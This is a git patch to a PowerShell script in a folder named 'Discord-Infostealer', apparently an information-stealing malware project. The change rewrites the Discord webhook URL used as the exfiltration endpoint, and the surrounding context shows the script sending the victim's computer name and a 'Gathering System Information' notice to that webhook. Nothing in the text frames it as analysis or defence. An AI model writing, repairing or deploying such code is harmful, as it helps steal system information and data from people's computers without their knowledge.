From 2419974958d09557477fb859445ca4108d7b7315 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Thu, 19 Jun 2025 16:33:02 +0000 Subject: [PATCH] Update main.ps1 --- Discord-Infostealer/main.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Discord-Infostealer/main.ps1 b/Discord-Infostealer/main.ps1 index 8e5cc01..656e743 100644 --- a/Discord-Infostealer/main.ps1 +++ b/Discord-Infostealer/main.ps1 @@ -26,7 +26,7 @@ else{ sleep 1 Add-Type -AssemblyName System.Windows.Forms -$hookurl = "$dc" +$hookurl = ("https://discord.com/api/webhooks/" + "$dc") # Send a notification to discord on start $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":computer: ``Gathering System Information for $env:COMPUTERNAME`` :computer:"} | ConvertTo-Json